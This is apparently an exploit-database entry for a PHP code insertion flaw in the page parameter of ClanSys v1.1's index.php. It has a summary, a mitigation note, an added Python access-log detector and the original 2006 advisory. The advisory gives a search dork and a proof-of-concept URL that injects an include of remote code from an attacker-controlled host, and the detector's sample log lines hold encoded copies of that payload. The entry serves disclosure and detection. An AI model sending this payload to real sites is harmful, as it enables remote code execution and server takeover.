Vendor: ClanSys
By: nukedx
CVSS: 7.5 (HIGH)
Vulnerability Type: PHP Code Insertion
CWE: 94
Product Name: ClanSys
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:clansys:clansys:1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

ClanSys v1.1 (index.php page) PHP Code Insertion Vulnerability

ClanSys v1.1 is vulnerable to PHP Code Insertion through the page parameter of index.php. An attacker can exploit this vulnerability by sending a crafted HTTP request that carries malicious PHP code in that parameter. The web server then executes the injected code.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of ClanSys.
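
A log check for the request pattern this advisory describes, as an added example that is not part of the original advisory or of ClanSys: it flags index.php requests whose page parameter decodes to a PHP open tag and notes any other parameter that carries a remote URL. The combined access-log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request target inside an access-log entry (combined log format assumed).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PHP_OPEN_TAG_RE = re.compile(r'<\?')                 # matches <?, <?php and <?=
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%253C -> %3C -> <) so encoded tags are seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return a finding for an index.php request whose page= holds PHP code, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/index.php"):
        return None
    params = [(k, fully_decode(v)) for k, v in parse_qsl(url.query, keep_blank_values=True)]
    if not any(k == "page" and PHP_OPEN_TAG_RE.search(v) for k, v in params):
        return None
    # A second parameter carrying a URL matches the remote-include form of the request.
    remote = [k for k, v in params if k != "page" and REMOTE_URL_RE.match(v)]
    return {"client": line.split(" ", 1)[0], "remote_url_params": remote}

def scan(lines):
    """Collect findings for every suspicious line, in log order."""
    return [f for f in map(inspect_line, lines) if f is not None]

# Constructed sample entries (documentation IPs, placeholder host and install path).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Apr/2006:10:00:01 +0000] "GET /clansys/index.php?page=news HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/Apr/2006:10:00:05 +0000] "GET /clansys/index.php?page=%3C%3Finclude(%24s)%3B%3F%3E&s=http://example.invalid/x.txt%3F HTTP/1.1" 200 734',
    '198.51.100.7 - - [23/Apr/2006:10:00:09 +0000] "GET /clansys/index.php?page=%253C%253Finclude(%2524s)%253B%253F%253E HTTP/1.1" 200 91',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```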

Exploit-DB raw data:

NukedX Security Advisory Nr 2006-29
ClanSys v1.1 (index.php page) PHP Code Insertion Vulnerability
Method found & Exploit scripted by nukedx
Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
Original advisory: http://www.nukedx.com/?viewdoc=29
Dork: "ClanSys v.1.1" 2.400 pages.
Full PoC ->
GET -> http://[victim]/[ClanSysPath]/index.php?page=[PHPCode]
EXAMPLE -> http://[victim]/[ClanSysPath]/index.php?page=<?include($s);?>&s=http://yourhost.com/cmd.txt?

# nukedx.com [2006-04-23]

# milw0rm.com [2006-04-23]